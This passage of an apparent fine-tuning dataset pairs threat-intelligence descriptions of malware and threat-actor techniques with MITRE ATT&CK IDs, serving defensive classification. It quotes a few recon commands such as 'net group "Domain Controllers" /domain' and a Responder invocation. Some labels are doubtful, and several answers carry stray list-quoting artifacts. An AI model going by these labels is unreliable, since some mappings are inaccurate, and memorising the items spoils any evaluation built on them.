- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In addition to loading the communications module, the initial macro described above configures a persistence mechanism for this malware loader by setting up a Registry Run key. The non-concatenated command included in the macro that establishes persistence for Libcurl.dll and the hash for this sample are included below"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Flagpro has exfiltrated data to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The sample was first uploaded to VT on the 2018-10-12 from the Ukraine. It exhibits an encoding and a code style that are similar to those used by former series of Hades droppers. Nevertheless, it introduces new features like anti-analysis and delayed execution, which were only used by the second stage payload in the past."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Bazar backdoor is a new stealthy malware, part of the TrickBot group’s toolkit arsenal and leveraged for high-value targets. The Bazar loader is used to download and execute the Bazar backdoor on the target system. The goal of this backdoor is to execute binaries, scripts, modules, kill processes, and then remove itself from the compromised machine. The samples used in this campaign heavily rely on control flow obfuscation"
- },
- {
- "role": "assistant",
- "content": "T1104 - Multi-Stage Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is a Web shell. The ASPXTool version used by has been deployed to accessible servers running Internet Information Services (IIS)."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can take screenshots of the desktop and target application windows, saving them to user directories as one byte XOR encrypted .dat files."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The SLUB backdoor is a custom one written in the C++ programming language, statically linking curl library to perform multiple HTTP requests. Other statically-linked libraries are boost (for extracting commands from gist snippets) and JsonCpp (for parsing slack channel communication)."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RainyDay can use side-loading to run malicious executables."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Prikormka encodes C2 traffic with Base64."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SYSCON has the ability to use FTP in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.002 - File Transfer Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Goopy has the ability to maintain persistence by creating scheduled tasks set to run every hour."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "All of the bait documents are MHTML ones with malicious macro embedded and the .doc suffix to bypass detection. Below is an example of bait document captured by 360 Threat Intelligence Center in February 2019"
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Okrum can obtain the date and time of the compromised system."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SILENTTRINITY tracks `TrustedHosts` and can move laterally to these targets via WinRM."
- },
- {
- "role": "assistant",
- "content": "T1021.006 - Remote Services: Windows Remote Management"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If the attack progresses, the user will be taken to the download of an MS Word document containing malicious macros that has very low detection rate at the moment of this campaign delivery. From a metadata standpoint, the document does not include any specific signal or characteristic that would help us tracking documents from the same author, as shown in Figure 6"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment', 'T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NativeZone has checked if Vmware or VirtualBox VM is running on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The wiper is relatively small in size and dynamically resolves most of the APIs it uses. Before starting any file destruction, it checks to ensure that the machine is not a domain controller. If the machine is a domain controller, it stops execution. Pseudo-code: CaddyWiper checking for the Domain Controller role of the machine. If the system is not a domain controller, the wiper will destroy files on \"C:\\Users,\" followed by wiping of all files in the next drive letter until it reaches the \"Z\" drive. This means that the wiper will also attempt to wipe any network mapped drive attached to the system"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Analysis of the “log.dat” payloads determined them to be variants of the publicly available POSHC2 proxy-aware stager written to download and execute PowerShell payloads from a hardcoded command and control (C2) address. These particular POSHC2 samples run on the .NET framework and dynamically load payloads from Base64 encoded strings"
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To move laterally on a victim network, FIN6 has used credentials stolen from various systems on which it gathered usernames and password hashes."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LoudMiner is typically bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aoqin Dragon has exploited CVE-2012-0158 and CVE-2010-3333 for execution against targeted systems."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Patchwork apparently altered NDiskMonitor samples by adding four bytes of random letters in a likely attempt to change the file hashes."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding', 'T1027.005 - Indicator Removal from Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Peppy can log keystrokes on compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "REvil has used PowerShell to delete volume shadow copies and download files."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "macOS.OSAMiner has searched for the Activity Monitor process in the System Events process list and kills the process if running. macOS.OSAMiner also searches the operating system's `install.log` for apps matching its hardcoded list, killing all matching process names."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aria-body has the ability to gather metadata from a file and to search for file and directory names."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has enumerated DC servers using the command \"net group \"Domain Controllers\" /domain\". The group has also used the \"ping\" command."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "With the amount of overlap between the other components in these separate campaigns, we decided to compare the Pirpi payloads delivered by the UPS group using CVE-2014-1776 and CVE-2015-3113. From here on, we will refer to these two payloads as Pirpi.2014 (CVE-2014-1776) and Pirpi.2015 (CVE-2015-3113), whose details are listed in Table 1. Unit 42 discovered several similarities between the two Pirpi variants, as well as a few equally important differences, both of which are worth discussing. We also compared the Pirpi.2014 and Pirpi.2015 payloads to other known Pirpi samples in an attempt to determine which variant they most closely resemble."
- },
- {
- "role": "assistant",
- "content": "T1588.006 - Vulnerabilities"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A batch file that is used to run Bitsadmin and Rundll to download and execute the Egregor payload. A Zip file contains a binary file that is an RClone client, renamed svchost, and RClone config files (webdav, ftp and dropbox) used later for exfiltration"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Displayed below are these new, xml formatted plugin names “weap_hwi”, “ps”, and “vsnet” in a BlackEnergy configuration file download from a c2 server"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group executed Responder using the command \"[Responder file path] -i [IP address] -rPv\" on a compromised host to harvest credentials and move laterally."
- },
- {
- "role": "assistant",
- "content": "T1557.001 - Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After obtaining the unique ID from the C2 server, the Trojan calls the “SetAbStatById” method to notify the C2 server of its status of “1” to notify the server it had successfully received the filename and file data"
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Silence has used Nmap to scan the corporate network, build a network topology, and identify vulnerable hosts."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kivars has the ability to initiate keylogging on the infected host."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoshC2 contains a module for compressing data using ZIP."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can upload files to the victim's machine for operations."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This component overwrites the master boot record (MBR) of an infected host with a malicious 16-bit bootloader with a SHA256 hash of"
- },
- {
- "role": "assistant",
- "content": "T1561.002 - Disk Structure Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HotCroissant can retrieve a list of applications from the \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\" registry key."
- },
- {
- "role": "assistant",
- "content": "T1518 - Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stolen Pencil gathers credentials using Mimikatz and Procdump."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can capture screenshots at a configurable interval."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZeroT gathers the victim's IP address and domain information, and then sends it to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole can register itself for execution and persistence via the Control Panel."
- },
- {
- "role": "assistant",
- "content": "T1218.002 - Signed Binary Proxy Execution: Control Panel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "decodes an embedded configuration using XOR."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor used RDP on Active Directory using leaked accounts. The actor dropped scanning tools, Nmap.exe and Nping.exe, for scanning the network. Next, the scheduled task was pushed by the group policy domain machine."
- },
- {
- "role": "assistant",
- "content": "T1484 - Domain or Tenant Policy Modification', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lately, the configuration mechanism has been changed and is now stored in the Windows Registry at HKCU\\Software\\ under keys with names like %USERNAME% and ToolTech-RM. Those names, as well as the names of values they contain, change frequently, but the information contained consists of"
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LiteDuke has used image files to hide its loader component."
- },
- {
- "role": "assistant",
- "content": "T1027.003 - Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mongall can identify drives on compromised hosts and retrieve the hostname via `gethostbyname`."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Amadey has used a variety of Windows API calls, including `GetComputerNameA`, `GetUserNameA`, and `CreateProcessA`."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca has registered domains, intended to look like legitimate target domains, that have been used in watering hole attacks."
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Andariel has hidden malicious executables within PNG files."
- },
- {
- "role": "assistant",
- "content": "T1027.003 - Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The service-based DLL implant traverses to the /htdocs/ directory on the FTP server and looks for any files with the keywords"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In one instance, FIN13 deployed a backdoor called MAILSLOT, which communicates over SMTP/POP over SSL, sending and receiving emails to and from a configured attacker-controlled email account for its command and control. MAILSLOT makes FIN13 a rare case of a threat actor who has used email communications for C2."
- },
- {
- "role": "assistant",
- "content": "T1102.003 - One-Way Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ebury has used user mode rootkit techniques to remain hidden on the system."
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Executive summary . The PROMETHIUM threat actor — active since 2012 — has been exposed multiple times over the past several years.. However, this has not deterred this actor from continuing and expanding their activities. The group has at least four new trojanized setup files we observed: Firefox (a browser), VPNpro (a VPN client), DriverPack (a pack of drivers) and 5kPlayer (a media player). How did it work. Talos could not pinpoint the initial attack vector, however, the use of trojanized installation files to well-known applications is consistent with the previously documented campaigns. The trojanized setup will install the malware and the legitimate application, which is a good way to disguise its activities. PROMETHIUM has been resilient over the years. We have no evidence that the websites of the real applications were compromised to host the malicious installer. We can conclude that the PROMETHIUM threat actor is interested in new countries or the malicious framework developed by this threat actor is exported in more countries than previously thought. The usage of the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key has a persistence mechanism that has been replaced by the creation of a service. The malicious service: rmaserv.exe . This binary has two main features. Conclusion . The PROMETHIUM threat actor is dedicated and resilient, exposing them hasn't refrained them from moving forward with their agenda"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a custom packing algorithm."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Meteor can run `set.bat`, `update.bat`, `cache.bat`, `bcd.bat`, `msrun.bat`, and similar scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KEYMARBLE has a command to create Registry entries for storing data under \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\WABE\\DataPath\"."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has also used a Mac OS Python implant that gathers data from Mac OS systems and sends it to a C2 server (Command and Scripting Interpreter: Python [T1059.006]). The Python program downloads various implants based on C2 options specified after the filedown.php (see figure 4"
- },
- {
- "role": "assistant",
- "content": "T1071.003 - Mail Protocols', 'T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Moses Staff has downloaded and installed web shells to following path \"C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\IISpool.aspx\"."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can obtain the computer name, OS version, and default language identifier."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NDiskMonitor obtains the victim username and encrypts the information to send over its C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The OsInfo function in Komplex collects a running process list."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Small Sieve can obtain the IP address of a victim host."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This said macro executes a command to download the first stage payload using msiexec.exe, a Microsoft Installer tool that can download and run a Windows Installer file. The first stage payload is an MSI Installer that was created using an EXE to MSI converter"
- },
- {
- "role": "assistant",
- "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some Daserf samples were signed with a stolen digital certificate."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Almost exclusively, Unit 42 has seen the use of weaponized documents that require user execution. Only once in the last six months have we seen use of exploits to circumvent the need for the user to execute any part of the installation chain"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Along with the JavaScript RAT, DarkWatchman features a C# keylogger. The keylogger is distributed as obfuscated C# source code that is processed and stored in the registry as a Base64-encoded PowerShell command. When the RAT is launched, it executes this PowerShell script which, in turn, compiles the keylogger (using CSC) and executes it. The keylogger itself does not communicate with the C2 or write to disk. Instead, it writes it’s keylog to a registry key that it uses as a buffer. During its operation, the RAT scrapes and clears this buffer before transmitting the logged keystrokes to the C2 server"
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacMa can manage remote screen sessions."
- },
- {
- "role": "assistant",
- "content": "T1021 - Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StoneDrill can obtain the current date and time of the victim machine."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
